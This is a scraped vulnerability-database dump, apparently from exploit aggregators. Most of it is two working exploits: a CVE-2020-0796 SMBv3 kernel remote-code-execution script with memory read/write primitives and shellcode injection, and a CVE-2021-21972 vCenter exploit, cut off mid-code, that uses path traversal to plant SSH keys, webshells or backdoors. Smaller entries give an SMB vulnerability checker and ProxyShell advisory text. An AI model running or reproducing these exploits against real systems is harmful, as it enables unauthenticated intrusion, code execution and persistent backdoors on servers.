def raw_bytes(self):\n mdl_bytes = self.next + self.size + self.mdl_flags + \\\n self.alloc_processor + self.reserved + self.process + \\\n self.map_va + self.start_va + self.byte_count + \\\n self.byte_offset + self.phys_addr1 + self.phys_addr2 + \\\n self.phys_addr3\n return mdl_bytes\n\n\ndef reconnect(ip, port):\n sock = socket.socket(socket.AF_INET)\n sock.settimeout(7)\n sock.connect((ip, port))\n return sock\n\n\ndef write_primitive(ip, port, data, addr):\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n sock.recv(1000)\n uncompressed_data = b\"\\x41\"*(overflow_val - len(data))\n uncompressed_data += b\"\\x00\"*PNET_RAW_BUFF_OFFSET\n uncompressed_data += struct.pack('<Q', addr)\n compressed_data = compress(uncompressed_data)\n smb_compress(sock, compressed_data, 0xFFFFFFFF, data)\n sock.close()\n\n\ndef write_srvnet_buffer_hdr(ip, port, data, offset):\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n sock.recv(1000)\n compressed_data = compress_evil(data)\n dummy_data = b\"\\x33\"*(overflow_val + offset)\n smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)\n sock.close()\n\n\ndef read_physmem_primitive(ip, port, phys_addr):\n i = 0\n while i < max_read_retry:\n i += 1\n buff = try_read_physmem_primitive(ip, port, phys_addr)\n if buff is not None:\n return buff\n\n\ndef try_read_physmem_primitive(ip, port, phys_addr):\n fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()\n write_primitive(ip, port, fake_mdl, pmdl_va)\n write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)\n\n i = 0\n while i < max_read_retry:\n i += 1\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n buff = sock.recv(1000)\n sock.close()\n if buff[4:8] != b\"\\xfeSMB\":\n return buff\n\n\ndef get_phys_addr(ip, port, va_addr):\n pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))\n pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))\n pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))\n pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))\n\n pml4e = PML4 + pml4_index*0x8\n pdpt_buff = read_physmem_primitive(ip, port, pml4e)\n\n if pdpt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pdpt = struct.unpack(\"<Q\", pdpt_buff[0:8])[0] & 0xFFFFF000\n pdpte = pdpt + pdpt_index*0x8\n pdt_buff = read_physmem_primitive(ip, port, pdpte)\n\n if pdt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pdt = struct.unpack(\"<Q\", pdt_buff[0:8])[0] & 0xFFFFF000\n pdte = pdt + pdt_index*0x8\n pt_buff = read_physmem_primitive(ip, port, pdte)\n\n if pt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pt = struct.unpack(\"<Q\", pt_buff[0:8])[0]\n \n if pt & (1 << (8 - 1)):\n phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)\n return phys_addr\n else:\n pt = pt & 0xFFFFF000\n\n pte = pt + pt_index*0x8\n pte_buff = read_physmem_primitive(ip, port, pte)\n\n if pte_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n phys_addr = (struct.unpack(\"<Q\", pte_buff[0:8])[0] & 0xFFFFF000) + \\\n (va_addr & 0xFFF)\n\n return phys_addr\n\n\ndef get_pte_va(addr):\n pt = addr >> 9\n lb = (0xFFFF << 48) | (PML4_SELFREF << 39)\n ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +\n 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8\n pt = pt | lb\n pt = pt & ub\n\n return pt\n\n\ndef overwrite_pte(ip, port, addr):\n phys_addr = get_phys_addr(ip, port, addr)\n\n buff = read_physmem_primitive(ip, port, phys_addr)\n\n if buff is None:\n sys.exit(\"[-] read primitive failed!\")\n\n pte_val = struct.unpack(\"<Q\", buff[0:8])[0]\n\n # Clear NX bit\n overwrite_val = pte_val & (((1 << 63) - 1))\n overwrite_buff = struct.pack(\"<Q\", overwrite_val)\n\n write_primitive(ip, port, overwrite_buff, addr)\n\n\ndef build_shellcode():\n global KERNEL_SHELLCODE\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_INTERRUPT +\n HALP_APIC_REQ_INTERRUPT_OFFSET)\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_APIC_INTERRUPT)\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PNT_ENTRY & 0xFFFFFFFFFFFFF000)\n KERNEL_SHELLCODE += USER_PAYLOAD\n\n\ndef search_hal_heap(ip, port):\n global PHALP_INTERRUPT\n global PHALP_APIC_INTERRUPT\n search_len = 0x10000\n\n index = PHAL_HEAP\n page_index = PHAL_HEAP\n cons = 0\n phys_addr = 0\n\n while index < PHAL_HEAP + search_len:\n\n # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, \n # so we try to reduce number of reads like this \n \n if not (index & 0xFFF):\n phys_addr = get_phys_addr(ip, port, index)\n else:\n phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)\n\n buff = read_physmem_primitive(ip, port, phys_addr)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\n i = 0\n \n # This heuristic seems to be OK to find HalpInterruptController, but could use improvement\n while i < entry_indices:\n entry = struct.unpack(\"<Q\", buff[i:i+8])[0]\n i += 8\n if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:\n cons = 0\n continue\n cons += 1\n if cons > 3:\n PHALP_INTERRUPT = index + i - 0x40\n print(\"[+] found HalpInterruptController at %lx\"\n % PHALP_INTERRUPT)\n\n if len(buff) < i + 0x40:\n buff = read_physmem_primitive(ip, port, index + i + 0x38)\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\", buff[0:8])[0]\n \n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n else:\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\",buff[i + 0x38:i+0x40])[0]\n \n print(\"[+] found HalpApicRequestInterrupt at %lx\" % PHALP_APIC_INTERRUPT)\n \n return\n index += entry_indices\n\n sys.exit(\"[-] failed to find HalpInterruptController!\")\n\n\ndef search_selfref(ip, port):\n search_len = 0x1000\n index = PML4\n\n while search_len:\n buff = read_physmem_primitive(ip, port, index)\n if buff is None:\n return\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\n i = 0\n while i < entry_indices:\n entry = struct.unpack(\"<Q\",buff[i:i+8])[0] & 0xFFFFF000\n if entry == PML4:\n return index + i\n i += 8\n search_len -= entry_indices\n index += entry_indices\n\n\ndef find_pml4_selfref(ip, port):\n global PML4_SELFREF\n self_ref = search_selfref(ip, port)\n\n if self_ref is None:\n sys.exit(\"[-] failed to find PML4 self reference entry!\")\n\n PML4_SELFREF = (self_ref & 0xFFF) >> 3\n\n print(\"[+] found PML4 self-ref entry %0x\" % PML4_SELFREF)\n\n\ndef find_low_stub(ip, port):\n global PML4\n global PHAL_HEAP\n global PNT_ENTRY\n\n limit = 0x100000\n index = 0x1000\n\n while index < limit:\n buff = read_physmem_primitive(ip, port, index)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n entry = struct.unpack(\"<Q\", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF\n\n if entry == LOWSTUB_JMP:\n print(\"[+] found low stub at phys addr %lx!\" % index)\n PML4 = struct.unpack(\"<Q\", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]\n print(\"[+] PML4 at %lx\" % PML4)\n PHAL_HEAP = struct.unpack(\"<Q\", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000\n print(\"[+] base of HAL heap at %lx\" % PHAL_HEAP)\n\n buff = read_physmem_primitive(ip, port, index + NTENTRY_LOWSTUB_OFFSET)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n PNT_ENTRY = struct.unpack(\"<Q\", buff[0:8])[0]\n print(\"[+] ntoskrnl entry at %lx\" % PNT_ENTRY)\n return\n\n index += 0x1000\n\n sys.exit(\"[-] Failed to find low stub in physical memory!\")\n\n\ndef do_rce(ip, port):\n find_low_stub(ip, port)\n find_pml4_selfref(ip, port)\n search_hal_heap(ip, port)\n \n build_shellcode()\n\n print(\"[+] built shellcode!\")\n\n pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)\n print(\"[+] KUSER_SHARED_DATA PTE at %lx\" % pKernelUserSharedPTE)\n\n overwrite_pte(ip, port, pKernelUserSharedPTE)\n print(\"[+] KUSER_SHARED_DATA PTE NX bit cleared!\")\n \n # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.\n to_write = len(KERNEL_SHELLCODE)\n write_bytes = 0\n while write_bytes < to_write:\n write_sz = min([write_unit, to_write - write_bytes])\n write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)\n write_bytes += write_sz\n \n print(\"[+] Wrote shellcode at %lx!\" % pshellcodeva)\n\n input(\"[+] Press a key to execute shellcode!\")\n \n write_primitive(ip, port, struct.pack(\"<Q\", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)\n print(\"[+] overwrote HalpInterruptController pointer, should have execution shortly...\")\n \n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ip\", help=\"IP address of target\", required=True)\n parser.add_argument(\"-p\", \"--port\", default=445, help=\"SMB port, \\\n default: 445\", required=False, type=int)\n args = parser.parse_args()\n\n do_rce(args.ip, args.port)\n", "sourceHref": "https://0day.today/exploit/34504", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-02T09:24:30", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-17T00:00:00", "type": "zdt", "title": "Microsoft Windows SMB 3.1.1 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-17T00:00:00", "id": "1337DAY-ID-34105", "href": "https://0day.today/exploit/description/34105", "sourceData": "# Exploit Title: Windows SMBv3 Client/Server Remote Code Execution\nVulnerability - remote\n# Author: nu11secur1ty\n# Vendor: https://smb.wsu.edu/\n# Link:\nhttps://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796\n# CVE: CVE-2020-0796\n\n\n\n[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)\n[+] Website: https://www.nu11secur1ty.com/\n[+] Source: readme from GitHUB\n[+] twitter.com/nu11secur1ty\n\n\n[Exploit Program Code]\n--------------------------------------\nimport socket\nimport struct\nimport sys\n\nsmbsuckmickey_mouse =\nb'\\x00\\x00\\x00\\xc0\\xfeSMB@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00$\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x02\\x10\\x02\"\\x02$\\x02\\x00\\x03\\x02\\x03\\x10\\x03\\x11\\x03\\x00\\x00\\x00\\x00\\x01\\x00&\\x00\\x00\\x00\\x00\\x00\\x01\\x00\n\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\n\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\nsock = socket.socket(socket.AF_INET)\nsock.settimeout(3)\nsock.connect(( sys.argv[1], 445 ))\nsock.send(smbsuckmickey_mouse)\n\nnb, = struct.unpack(\">I\", sock.recv(4))\nres = sock.recv(nb)\n\nif not res[68:70] == b\"\\x11\\x03\":\n exit(\"Not vulnerable.\")\nif not res[70:72] == b\"\\x02\\x00\":\n exit(\"Not vulnerable.\")\n\nexit(\"Vulnerable.\")\n\n--------------------------------------\n\n#!/usr/bin/bash\nif [ $# -eq 0 ]\nthen\necho $'Usage:\\n\\vulnsmb.sh TARGET_IP_or_CIDR'\nexit 1\nfi\necho \"Checking if there's SMB v3.11 in\" $1 \"...\"\nnmap -p445 --script smb-protocols -Pn -n $1 | grep -P\n'\\d+\\.\\d+\\.\\d+\\.\\d+|^\\|.\\s+3.11' | tr '\\n' ' ' | replace 'Nmap scan report\nfor' '@' | tr \"@\" \"\\n\" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP\n'\\d+\\.\\d+\\.\\d+\\.\\d+'\nif [[ $? != 0 ]]; then\necho \"There's no SMB v3.11\"\nfi\n\n-------------------------------------\n\n[Vendor]\nMicrosoft\n\n\n[Product]\nhttps://smb.wsu.edu/\n\n\n[Vulnerability Type]\nRemote + Layer 2\n\n\n\n[Security Issue]\nThe security update addresses the vulnerability by correcting how the SMBv3\nprotocol handles these specially crafted requests.\n\n\n[References]\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796\nA remote code execution vulnerability exists in the way that the Microsoft\nServer Message Block 3.1.1 (SMBv3) protocol handles certain requests.\nAn attacker who successfully exploited the vulnerability could gain the\nability to execute code on the target server or client.\nTo exploit the vulnerability against a server, an unauthenticated attacker\ncould send a specially crafted packet to a targeted SMBv3 server.\nTo exploit the vulnerability against a client, an unauthenticated attacker\nwould need to configure a malicious SMBv3 server and convince a user to\nconnect to it.\nThe security update addresses the vulnerability by correcting how the SMBv3\nprotocol handles these specially crafted requests.\n\n[Network Access]\nRemote + Layer 2\n\n\n[Disclosure Timeline]\nPublished: 03/12/2020\n\n\n[+] Disclaimer\nThe entry creation date may reflect when the CVE ID was allocated or\nreserved,\nand does not necessarily indicate when this vulnerability was discovered,\nshared\nwith the affected vendor, publicly disclosed, or updated in CVE.\n", "sourceHref": "https://0day.today/exploit/34105", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2023-12-02T18:22:40", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Autodiscover service. The issue results from the lack of proper validation of URI prior to accessing resources. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdi", "title": "(Pwn2Own) Microsoft Exchange Server Autodiscover Server Side Request Forgery Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-07-19T00:00:00", "id": "ZDI-21-821", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-821/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-11-18T13:20:19", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/MuddyWater-is-taking-advantage-of-old-vulnerabilities_TA202149.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FA-zero-day-vulnerability-has-been-discovered-in-PANs-GlobalProtect-firewall_TA202148-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom&#x27;s National Cyber Security Centre (NCSC) have issued a joint advisory to warn organizations about an APT State sponsored Actor exploiting old Fortinet and proxyshell vulnerabilities. \nSince late March 2021, this APT Iranian State sponsored Actor (MuddyWater) has been breaching vulnerable networks by exploiting Fortinet vulnerabilities. The Hive Pro threat Research team has issued a detailed and in [depth](<https://www.hivepro.com/old-fortinet-vulnerabilities-exploited-by-state-sponsored-actors/>) advisory for the same. \nNow, in October 2021, MuddyWater is getting initial access to the susceptible system by exploiting the well known ProxyShell Vulnerability (CVE 2021 34473). \nIt is recommended that organizations patch these vulnerabilities as soon as available. \nThe Tactics and Techniques used by MuddyWater are: \nTA0042 - Resource Development \nT1588.001 - Obtain Capabilities: Malware \nT1588.002 - Obtain Capabilities: Tool \nTA0001 - Initial Access \nT1190 - Exploit Public Facing Application \nTA0002 - Execution \nT1053.005 - Scheduled Task/Job: Scheduled Task \nTA0003 - Persistence \nT1136.001 - Create Account: Local Account \nT1136.002 - Create Account: Domain Account \nTA0004 - Privilege Escalation \nTA0006 - Credential Access \nTA0009 - Collection \nT1560.001 - Archive Collected Data: Archive via Utility \nTA0010 - Exfiltration \nTA0040 - Impact \nT1486 - Data Encrypted for Impact\n\n#### Actor Details\n\n\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n\n\n#### Patch Link\n\n<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>\n\n<http://www.securityfocus.com/bid/108693>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-18T11:45:32", "type": "hivepro", "title": "MuddyWater is taking advantage of old vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-18T11:45:32", "id": "HIVEPRO:186D6EE394314F861D57F4243E31E975", "href": "https://www.hivepro.com/muddywater-is-taking-advantage-of-old-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-03-01T16:09:17", "description": "", "cvss3": {}, "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 7.0 Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161590", "href": "https://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html", "sourceData": "`# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload \n# Date: 2021-02-27 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html \n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) \n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds \n# CVE: CVE-2021-21972 \n \n#!/usr/bin/env python3 \n''' \nCopyright 2021 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-21972.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nCVE-2021-21972 is an unauthenticated file upload and overwrite, \nexploitation can be done via SSH public key upload or a webshell \nThe webshell must be of type JSP, and its success depends heavily on the specific vCenter version \n \n# Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister \n# A white page means vulnerable \n# A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) \n# Notes: \n# * On Linux SSH key upload is always best, when SSH access is possible & enabled \n# * On Linux the upload is done as user vsphere-ui:users \n# * On Windows the upload is done as system user \n# * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\" \n# * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: vulnerability checker + exploit \n''' \n \nimport os, tarfile, sys, optparse, requests \nrequests.packages.urllib3.disable_warnings() \n \nlProxy = {} \nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> \n<env:Body> \n<RetrieveServiceContent xmlns=\"urn:vim25\"> \n<_this type=\"ServiceInstance\">ServiceInstance</_this> \n</RetrieveServiceContent> \n</env:Body> \n</env:Envelope>''' \nsURL = sFile = sRpath = sType = None \n \ndef parseArguments(options): \nglobal sURL, sFile, sType, sRpath, lProxy \nif not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') \nsURL = options.url \nif sURL[-1:] == '/': sURL = sURL[:-1] \nif not sURL[:4].lower() == 'http': sURL = 'https://' + sURL \nsFile = options.file \nif not os.path.exists(sFile): exit('[-] File not found: ' + sFile) \nsType = 'ssh' \nif options.type: sType = options.type \nif options.rpath: sRpath = options.rpath \nelse: sRpath = None \nif options.proxy: lProxy = {'https': options.proxy} \n \ndef getVersion(sURL): \ndef getValue(sResponse, sTag = 'vendor'): \ntry: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] \nexcept: pass \nreturn '' \noResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) \n#print(oResponse.text) \nif oResponse.status_code == 200: \nsResult = oResponse.text \nif not 'VMware' in getValue(sResult, 'vendor'): \nexit('[-] Not a VMware system: ' + sURL) \nelse: \nsName = getValue(sResult, 'name') \nsVersion = getValue(sResult, 'version') # e.g. 7.0.0 \nsBuild = getValue(sResult, 'build') # e.g. 15934073 \nsFull = getValue(sResult, 'fullName') \nprint('[+] Identified: ' + sFull) \nreturn sVersion, sBuild \nexit('[-] Not a VMware system: ' + sURL) \n \ndef verify(sURL): \n#return True \nsURL += '/ui/vropspluginui/rest/services/uploadova' \ntry: \noResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) \nexcept: \nexit('[-] System not available: ' + sURL) \nif oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely \nelse: return False \n \ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): \ndef getResourcePath(): \noResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) \nreturn oResponse.text.split('static/')[1].split('/')[0] \noTar = tarfile.open('payloadLin.tar','w') \nif sRpath: ## version & build not important \nif sRpath[0] == '/': sRpath = sRpath[1:] \nsPayloadPath = '../../' + sRpath \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'absolute' \nelif sType.lower() == 'ssh': ## version & build not important \nsPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'ssh' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): \n## vCenter 6.5/6.7 < 13010631, just this location with a subnumber \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \nfor i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) \noTar.close() \nreturn 'webshell' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): \n## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \nelse: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): \n## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \n \n \ndef createTarWin(sFile, sRpath = None): \n## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows \nif sRpath: \nif sRpath[0] == '/': sRpath = sRpath[:1] \nsPayloadPath = '../../' + sRpath \nelse: \nsPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) \noTar = tarfile.open('payloadWin.tar','w') \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \n \ndef uploadFile(sURL, sUploadType, sFile): \n#print('[!] Uploading ' + sFile) \nsFile = os.path.basename(sFile) \nsUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' \narrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} \n## Linux \noResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Linux payload uploaded succesfully.') \nif sUploadType == 'ssh': \nprint('[+] SSH key installed for user \\'vsphere-ui\\'.') \nprint(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'') \nreturn True \nelif sUploadType == 'webshell': \nsWebshell = sURL + '/ui/resources/' + sFile \n#print('testing ' + sWebshell) \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) 